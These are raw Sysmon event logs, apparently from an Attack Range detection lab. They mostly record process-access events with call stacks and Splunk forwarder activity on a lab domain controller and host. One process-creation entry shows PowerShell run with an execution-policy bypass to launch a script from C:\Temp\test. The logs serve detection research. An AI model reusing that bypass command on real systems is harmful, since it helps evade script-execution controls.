indows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:26.826{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.825{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:26.825{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.824{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:26.824{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001051050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.798{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 
'C:\Temp\test\ws.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001051090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:27.896{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B56434E4FF92606EAC4500CBB38258C2,SHA256=029814D8516658C67C926482D965599C22FE2875F22E6A35530A3F45C200944C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808539Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.251{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57332-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000808538Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.853{0C1E0330-F5E7-60EB-9B79-00000000D001}14883632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808537Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5E7-60EB-9B79-00000000D001}1488C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808536Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808535Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808534Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808533Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808532Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808531Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808530Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808529Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808528Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808527Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F5E7-60EB-9B79-00000000D001}1488C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808526Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5E7-60EB-9B79-00000000D001}1488C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808525Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.697{0C1E0330-F5E7-60EB-9B79-00000000D001}1488C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808524Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.416{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5C11E2ECABBE70F5711B0795B4C601B,SHA256=1401F6B5A62A9170245C7B10E5BC55465753299F925CA079DF49E10053F6B24F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:27.035{466BC892-F5E6-60EB-817D-00000000CF01}84725608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:27.035{466BC892-F5E6-60EB-817D-00000000CF01}84725608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:27.035{466BC892-F5E6-60EB-817D-00000000CF01}84725608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+517
81 10341000x80000000000000001051086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:27.035{466BC892-F5E6-60EB-817D-00000000CF01}84725608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:27.035{466BC892-F5E6-60EB-817D-00000000CF01}84725608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 